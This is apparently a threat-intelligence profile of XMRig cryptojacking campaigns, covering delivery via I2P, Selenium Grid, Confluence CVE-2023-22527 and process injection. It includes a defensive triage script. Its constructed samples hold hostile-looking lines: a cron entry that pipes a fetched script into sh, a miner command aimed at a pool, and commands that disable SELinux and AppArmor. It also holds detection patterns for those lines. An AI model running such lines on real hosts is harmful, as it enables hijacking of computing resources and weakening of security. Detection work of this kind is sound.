Xmrig Miner

Malware updated 4 days ago (2024-09-12T13:17:43.297Z)
XMRig is an open-source CPU/GPU cryptocurrency miner (most often pointed at Monero) that supports numerous mining protocols. The miner itself is a legitimate tool; it becomes malware when threat actors drop it onto compromised systems to mine for their own wallets, hijacking CPU and GPU resources and disrupting normal operations. This profile aggregates several distinct campaigns that deliver XMRig, drawn from the source documents listed below.

I2P-delivered variant (CrowdStrike's I2PMiner report): a dropper orchestrates installation and execution of the miner. The dropper installs I2P tooling, a legitimate anonymising-network application, and uses I2P to download a custom XMRig build. It then generates and executes a script that downloads, configures, and runs a copy of the miner; in some instances that XMRig download script pushes a configuration to the running miner through XMRig's native HTTP API.

Selenium Grid campaigns: the recent proxyjacking and cryptomining activity against exposed Selenium Grid servers parallels a yearlong campaign revealed by Wiz in July, which used Selenium Grid as the vector to deploy XMRig. The attackers leverage the Selenium WebDriver API to run Python with a reverse shell, deploying scripts that download a modified XMRig build. On Linux hosts they install multiple cron jobs to maintain persistence, disable all security tools, and then download the miner and begin mining. On Windows hosts they use a malicious script that downloads the tools needed to unpack and execute XMRig.

Confluence cryptojacking ecosystem (Trend Micro): attackers gain initial access by exploiting CVE-2023-22527, the unauthenticated template-injection RCE in Atlassian Confluence Server and Data Center. The first threat actor described there runs its mining activity from an ELF payload: after exploitation it ensures all cloud monitoring and security services are terminated or deleted, terminates the entry-point process, and downloads XMRig to begin mining.

Blue Mockingbird (MITRE): on Windows, the attack creates an "AddinProcess.exe" process to host the miner, writes the XMRig payload into that process, and runs it from there.
Description last updated: 2024-09-12T13:15:41.844Z
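The campaigns above leave three kinds of host artefact a responder can check for: a miner command line carrying a stratum pool URL, a wallet and XMRig option names; cron entries that fetch-and-pipe a script or launch something from a temp path at reboot; and an XMRig-style config.json whose HTTP API is enabled and unrestricted, the setting that lets a dropper push configuration to the miner remotely. The triage script below is an added example, not code from this profile or from any of the vendor reports it cites. Every sample line is constructed (placeholder wallet, RFC 5737 test IP, reserved .test domain), and the option and config key names (--donate-level, --cpu-priority, pools[].url/user, http.restricted) are assumed to match XMRig's public CLI and config schema.

```python
"""Triage constructed process, cron and config artefacts for XMRig-style mining."""
import json
import re

# Indicator patterns. Option names are assumed from XMRig's public CLI/config schema.
STRATUM_RE = re.compile(r"stratum\+(?:tcp|ssl)://[\w.\-]+:\d{2,5}")
# Standard Monero addresses: 95 base58 chars starting with 4 (8 for subaddresses).
MONERO_ADDR_RE = re.compile(r"\b[48][1-9A-HJ-NP-Za-km-z]{94}\b")
MINER_FLAGS = ("--donate-level", "--cpu-priority", "--randomx", "--coin",
               "--algo", "--http-port", "--http-access-token")
TAMPER_RE = re.compile(r"\b(?:setenforce 0|systemctl (?:stop|disable) \S+|ufw disable|iptables -F)\b")
PIPE_TO_SHELL_RE = re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba|da)?sh\b")
TMP_PATH_RE = re.compile(r"/(?:tmp|var/tmp|dev/shm)/")

# Constructed samples: placeholder wallet, RFC 5737 test IP, reserved .test domain.
SAMPLE_WALLET = "4" + "A" * 94
SAMPLE_PROCESSES = [
    "/usr/sbin/sshd -D",
    f"/tmp/.x/kthreadd -o stratum+tcp://pool.example.test:3333 -u {SAMPLE_WALLET} "
    "--donate-level 0 --cpu-priority 5",
    "/usr/bin/python3 /opt/app/worker.py",
    "setenforce 0",
    "systemctl stop apparmor",
]
SAMPLE_CRON = [
    "0 3 * * * /usr/bin/certbot renew --quiet",
    "*/5 * * * * curl -fsSL http://203.0.113.10/x.sh | sh",
    "@reboot /tmp/.x/kthreadd -c /tmp/.x/config.json",
]
SAMPLE_CONFIG = json.dumps({
    "autosave": True,
    "donate-level": 0,
    "cpu": {"enabled": True},
    "pools": [{"url": "pool.example.test:3333", "user": SAMPLE_WALLET, "pass": "x"}],
    # enabled + restricted=false is what allows a remote script to PUT a new config
    "http": {"enabled": True, "host": "0.0.0.0", "port": 16000,
             "access-token": "token", "restricted": False},
})


def scan_process_line(cmdline: str) -> set:
    """Tag a process command line with miner / security-tampering indicators."""
    tags = set()
    if STRATUM_RE.search(cmdline):
        tags.add("stratum_pool")
    if MONERO_ADDR_RE.search(cmdline):
        tags.add("monero_wallet")
    if any(flag in cmdline for flag in MINER_FLAGS):
        tags.add("xmrig_flags")
    if TAMPER_RE.search(cmdline):
        tags.add("security_tamper")
    return tags


def scan_cron_line(entry: str) -> set:
    """Tag a crontab entry with persistence indicators, plus whatever its command part trips."""
    tags = scan_process_line(entry)
    if PIPE_TO_SHELL_RE.search(entry):
        tags.add("cron_pipe_to_shell")
    if entry.startswith("@reboot"):
        tags.add("cron_reboot")
    if TMP_PATH_RE.search(entry):
        tags.add("cron_tmp_path")
    return tags


def scan_config(text: str) -> set:
    """Parse an XMRig-style config.json; return an empty set if it is not a JSON object."""
    try:
        cfg = json.loads(text)
    except json.JSONDecodeError:
        return set()
    if not isinstance(cfg, dict):
        return set()
    tags = set()
    for pool in cfg.get("pools", []):
        if isinstance(pool, dict) and pool.get("url"):
            tags.add("config_pool")
        if isinstance(pool, dict) and MONERO_ADDR_RE.search(str(pool.get("user", ""))):
            tags.add("monero_wallet")
    http = cfg.get("http", {})
    if isinstance(http, dict) and http.get("enabled") and not http.get("restricted", True):
        tags.add("api_unrestricted")
    if cfg.get("donate-level") == 0:
        tags.add("donate_level_zero")
    return tags


def triage(processes, cron_entries, config_text=None) -> dict:
    """Run all scanners; only lines that trip at least one indicator are reported."""
    report = {"process": {}, "cron": {}, "config": set()}
    for line in processes:
        tags = scan_process_line(line)
        if tags:
            report["process"][line] = tags
    for entry in cron_entries:
        tags = scan_cron_line(entry)
        if tags:
            report["cron"][entry] = tags
    if config_text is not None:
        report["config"] = scan_config(config_text)
    return report


if __name__ == "__main__":
    for section, hits in triage(SAMPLE_PROCESSES, SAMPLE_CRON, SAMPLE_CONFIG).items():
        print(section, hits)
```

On a live host the inputs would come from `ps -eo args`, the system and per-user crontabs, and any config.json found next to a suspicious binary; the `api_unrestricted` tag is the one worth escalating first, since an unrestricted API means the operator can change pools and wallets without touching disk again.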
Possible Aliases / Cluster overlaps
It's hard to track cluster overlaps and naming conventions between vendors, so here are some possible overlapping names / profiles you also may want to look at.
ID (votes): Profile Description
Xmrig (8 votes): XMRig is a type of malware that infiltrates systems to exploit them for malicious activities, such as cryptocurrency mining, DDoS attacks, spam distribution, and data theft. The dropper, which orchestrates the installation and execution of this malware, uses legitimate applications like the I2P tool
Pyloose (2 votes): In July, Wiz researchers issued a warning about PyLoose, a malicious software (malware) composed of Python code. This malware is designed to covertly load an XMRig miner (a program used for cryptocurrency mining) into a computer's memory using memfd, a Linux fileless-execution technique. This technique allows th
Miscellaneous Associations
Other elements of context that could aid in the identification of relevance
Payload
Python
Malware
Docker
Loader
Linux
Associated Vulnerabilities
ID (type, votes): Profile Description
CVE-2023-22527 (Unspecified, 2 votes): CVE-2023-22527 is a critical vulnerability found in Atlassian's Confluence Server and Data Center. This flaw, rated 10 out of 10 on the CVSS v3 scale, is a template injection issue that allows an unauthenticated attacker to execute remote code. The vulnerability specifically affects outdated version
Source Document References
Information about the Xmrig Miner malware was read from the documents listed below (this display is limited to 20 results).
Source (created): Title
DARKReading (4 days ago): Hackers Proxyjack & Cryptomine Selenium Grid Servers
Securityaffairs (17 days ago): Threat actors exploit Atlassian Confluence bug in cryptomining campaigns
DARKReading (19 days ago): Attackers Exploit Critical Atlassian Confluence Flaw for Cryptojacking
Trend Micro (20 days ago): Cryptojacking via CVE-2023-22527: Dissecting a Full-Scale Cryptomining Ecosystem
MITRE (2 years ago): TeamTNT with new campaign aka “Chimaera”
Checkpoint (a month ago): 29th July – Threat Intelligence Report - Check Point Research
Trend Micro (3 months ago): Examining Water Sigbin's Infection Routine Leading to an XMRig Cryptominer
Securityaffairs (3 months ago): Cryptojacking campaign targets exposed Docker APIs
DARKReading (4 months ago): Novel EDR-Killing 'GhostEngine' Malware Is Built for Stealth
Fortinet (2 years ago): 2022 IoT Threat Review | FortiGuard Labs
CERT-EU (a year ago): Meet PyLoose – First Python-Based Fileless Attack in the Wild
CERT-EU (a year ago): Andoryu Botnet Exploits Critical Ruckus Wireless Flaw for Widespread Attack
DARKReading (6 months ago): 'Fluffy Wolf' Spreads Meta Stealer in Corporate Phishing Campaign
CERT-EU (8 months ago): Cyber Security Week in Review: January 19, 2024
InfoSecurity-magazine (8 months ago): New Malware Campaign Exploits 9hits in Docker Assault
CERT-EU (8 months ago): ‘Yet another Mirai-based botnet’ is spreading an illicit cryptominer
MITRE (2 years ago): Blue Mockingbird activity mines Monero cryptocurrency
CERT-EU (8 months ago): New Malware Exploits 9Hits, Turns Docker Servers into Traffic Boosted Crypto Miners
CERT-EU (a year ago): Leftover Links 14/07/2023: Microsoft in Trouble With the FTC Again, This Time Over 'Open' 'AI'
CrowdStrike (2 years ago): CrowdStrike Uncovers I2Pminer MacOS Mineware Variant